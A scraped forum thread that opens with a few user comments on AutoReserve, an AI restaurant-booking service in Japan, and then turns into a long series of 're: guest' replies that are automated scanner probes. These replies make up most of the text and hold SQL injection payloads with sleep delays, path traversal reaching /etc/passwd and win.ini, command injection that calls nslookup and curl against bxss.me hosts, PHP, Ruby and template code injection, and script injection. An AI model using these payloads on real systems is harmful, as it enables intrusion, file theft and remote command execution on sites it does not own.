I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap
Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.
Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).
Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.
I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.
It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.
So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).
It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.
I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.
I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.
8 Comments
I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap
re: guest
DX84Bh1d
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+46-46-1=0+0+0+1
re: guest
-1 OR 3+46-46-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
te5fClNN'; waitfor delay '0:0:15' --
re: guest
-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))--
re: guest
-5) OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))--
re: guest
eJrFMpVi' OR 625=(SELECT 625 FROM PG_SLEEP(15))--
re: guest
kDJWta2d') OR 591=(SELECT 591 FROM PG_SLEEP(15))--
re: guest
joFJzdK1')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@iKFXC
re: guest
MCx7nZOK
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+362-362-1=0+0+0+1
re: guest
-1 OR 3+362-362-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
6GV3HVSP'; waitfor delay '0:0:15' --
re: guest
-5 OR 314=(SELECT 314 FROM PG_SLEEP(15))--
re: guest
-5) OR 621=(SELECT 621 FROM PG_SLEEP(15))--
re: guest
-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: guest
RLm86hqb' OR 606=(SELECT 606 FROM PG_SLEEP(15))--
re: guest
XuYYZPBs') OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: guest
p73KzAKf')) OR 83=(SELECT 83 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@HFO3k
re: guest
1ZzpmqoVO
re: guest
response.write(9708793*9061780)
re: guest
%0abcc:074625.67-13697.67.2aebf.19990.2@bxss.me
re: guest
'+response.write(9708793*9061780)+'
re: guest
to@example.com>%0d%0abcc:074625.67-13698.67.2aebf.19990.2@bxss.me
re: guest
"+response.write(9708793*9061780)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
${9999063+10000268}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
%2fetc%2fpasswd
re: guest
echo rccnms$()\ uwogns\nz^xyu||a #' &echo rccnms$()\ uwogns\nz^xyu||a #|" &echo rccnms$()\ uwogns\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
&echo intfrq$()\ rizrcb\nz^xyu||a #' &echo intfrq$()\ rizrcb\nz^xyu||a #|" &echo intfrq$()\ rizrcb\nz^xyu||a #
re: guest
)
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
|echo czitmb$()\ nadxmr\nz^xyu||a #' |echo czitmb$()\ nadxmr\nz^xyu||a #|" |echo czitmb$()\ nadxmr\nz^xyu||a #
re: guest
!(()&&!|*|*|
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
(nslookup hitgkbgqqpsrl75ca0.bxss.me||perl -e "gethostbyname('hitgkbgqqpsrl75ca0.bxss.me')")
re: guest
^(#$!@#$)(()))******
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
$(nslookup hithieweqcmfa36572.bxss.me||perl -e "gethostbyname('hithieweqcmfa36572.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&nslookup hitlxnuoeutqh0f9dd.bxss.me&'\"`0&nslookup hitlxnuoeutqh0f9dd.bxss.me&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&'\"`0&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&`'
re: guest
file:///etc/passwd
re: guest
|(nslookup hithhwerdysvdb7c23.bxss.me||perl -e "gethostbyname('hithhwerdysvdb7c23.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
`(nslookup hitvvigqfpdxx4740e.bxss.me||perl -e "gethostbyname('hitvvigqfpdxx4740e.bxss.me')")`
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
'.gethostbyname(lc('hitek'.'zihygqpya2f48.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(73).chr(108).chr(87).'
re: guest
/WEB-INF/web.xml
re: guest
;(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")|(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")&(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")
re: guest
".gethostbyname(lc("hitiz"."mmjqlwdtcd938.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(71).chr(101).chr(74)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
Http://bxss.me/t/fit.txt
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
/etc/shells
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
c:/windows/win.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
bxss.me
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(115).concat(72)+(require"socket"
Socket.gethostbyname("hitji"+"eipgjydm2a000.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
'+'A'.concat(70-3).concat(22*4).concat(119).concat(73).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitix'+'bntdfifxb3444.bxss.me.')[3].to_s)+'
re: guest
'"
re: guest
<!--
re: guest
1
re: guest
1
re: guest
-1 OR 2+147-147-1=0+0+0+1 --
re: guest
-1 OR 3+147-147-1=0+0+0+1 --
re: guest
-1 OR 2+677-677-1=0+0+0+1
re: guest
-1 OR 3+677-677-1=0+0+0+1
re: guest
-1' OR 2+404-404-1=0+0+0+1 --
re: guest
-1' OR 3+404-404-1=0+0+0+1 --
re: guest
-1' OR 2+473-473-1=0+0+0+1 or 'a6wdc0Hc'='
re: guest
-1' OR 3+473-473-1=0+0+0+1 or 'a6wdc0Hc'='
re: guest
-1" OR 2+617-617-1=0+0+0+1 --
re: guest
-1" OR 3+617-617-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
TXpjhF01'; waitfor delay '0:0:15' --
re: guest
-5 OR 76=(SELECT 76 FROM PG_SLEEP(15))--
re: guest
-5) OR 713=(SELECT 713 FROM PG_SLEEP(15))--
re: guest
-1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
re: guest
hALSadD2' OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: guest
eICRPnH9') OR 728=(SELECT 728 FROM PG_SLEEP(15))--
re: guest
Mf0MmkiG')) OR 382=(SELECT 382 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@fN9Ro
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1Z8ONZB7M0
re: guest
response.write(9508055*9747091)
re: guest
'+response.write(9508055*9747091)+'
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
"+response.write(9508055*9747091)+"
re: guest
${9999126+9999197}
re: guest
redirtest.acx
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
)
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
!(()&&!|*|*|
re: guest
file:///etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
../
re: guest
'.gethostbyname(lc('hitmt'.'cwfaymgab1a15.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(112).chr(83).'
re: guest
".gethostbyname(lc("hitho"."cvzggiew01fb2.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(69).chr(110).chr(69)."
re: guest
gethostbyname(lc('hitsb'.'mhlcjetw98062.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(82).chr(98).chr(69)
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'"
re: guest
"+"A".concat(70-3).concat(22*4).concat(110).concat(88).concat(104).concat(78)+(require"socket"
Socket.gethostbyname("hitta"+"xravxzlt27f71.bxss.me.")[3].to_s)+"
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: guest
replies
re: guest
<!--
re: guest
'+'A'.concat(70-3).concat(22*4).concat(112).concat(65).concat(106).concat(80)+(require'socket'
Socket.gethostbyname('hituj'+'atjyvzjrc384e.bxss.me.')[3].to_s)+'
re: guest
/etc/shells
re: guest
replies
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(114).concat(90)+(require'socket'
Socket.gethostbyname('hitqe'+'tptpptaz9ca7d.bxss.me.')[3].to_s)
re: guest
replies/.
re: guest
';print(md5(31337));$a='
re: guest
c:/windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
bxss.me
re: guest
${@print(md5(31337))}
re: guest
'"()&%<zzz><ScRiPt >lyuH(9850)</ScRiPt>
re: guest
Http://bxss.me/t/fit.txt
re: guest
${@print(md5(31337))}\
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitdkavtkevny73753.bxss.me")}}
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
'.print(md5(31337)).'
re: guest
'"()
re: guest
echo wrqhxd$()\ phkzcu\nz^xyu||a #' &echo wrqhxd$()\ phkzcu\nz^xyu||a #|" &echo wrqhxd$()\ phkzcu\nz^xyu||a #
re: guest
'"()&%<zzz><ScRiPt >lyuH(9850)</ScRiPt>
re: guest
'&&sleep(27*1000)*yjtppg&&'
re: guest
&echo fiiley$()\ mvpnpn\nz^xyu||a #' &echo fiiley$()\ mvpnpn\nz^xyu||a #|" &echo fiiley$()\ mvpnpn\nz^xyu||a #
re: guest
9973582
re: guest
|echo wpvlkx$()\ vgnhzn\nz^xyu||a #' |echo wpvlkx$()\ vgnhzn\nz^xyu||a #|" |echo wpvlkx$()\ vgnhzn\nz^xyu||a #
re: guest
"&&sleep(27*1000)*pgroua&&"
re: guest
expr 9000749700 - 955673
re: guest
'||sleep(27*1000)*htrtfh||'
re: guest
(nslookup -q=cname hitpjolxbugli18f79.bxss.me||curl hitpjolxbugli18f79.bxss.me))
re: guest
"||sleep(27*1000)*lidtrp||"
re: guest
$(nslookup -q=cname hitzuudmjjnzqfcd09.bxss.me||curl hitzuudmjjnzqfcd09.bxss.me)
re: guest
&nslookup -q=cname hittlbzyadmpge37a7.bxss.me&'\"`0&nslookup -q=cname hittlbzyadmpge37a7.bxss.me&`'
re: guest
&(nslookup -q=cname hitxtnowehhqmcd5e4.bxss.me||curl hitxtnowehhqmcd5e4.bxss.me)&'\"`0&(nslookup -q=cname hitxtnowehhqmcd5e4.bxss.me||curl hitxtnowehhqmcd5e4.bxss.me)&`'
re: guest
|(nslookup -q=cname hitolbdayxqjz7d674.bxss.me||curl hitolbdayxqjz7d674.bxss.me)
re: guest
`(nslookup -q=cname hitlnbstjvemma0593.bxss.me||curl hitlnbstjvemma0593.bxss.me)`
re: guest
;(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)|(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)&(nslookup -q=cname hitilksdgaoff4c06b.bxss.me||curl hitilksdgaoff4c06b.bxss.me)
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitxluuknmbcqc208d.bxss.me||curl${IFS}hitxluuknmbcqc208d.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitxpvtvbglyh717c4.bxss.me||curl${IFS}hitxpvtvbglyh717c4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitxpvtvbglyh717c4.bxss.me||curl${IFS}hitxpvtvbglyh717c4.bxss.me)&`'
re: guest
sJ3YtOeR
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
HdojWkHj'; waitfor delay '0:0:15' --
re: guest
-1 OR 325=(SELECT 325 FROM PG_SLEEP(15))--
re: guest
-1) OR 440=(SELECT 440 FROM PG_SLEEP(15))--
re: guest
-1)) OR 609=(SELECT 609 FROM PG_SLEEP(15))--
re: guest
389IIR7y' OR 357=(SELECT 357 FROM PG_SLEEP(15))--
re: guest
XnL9K7GD') OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
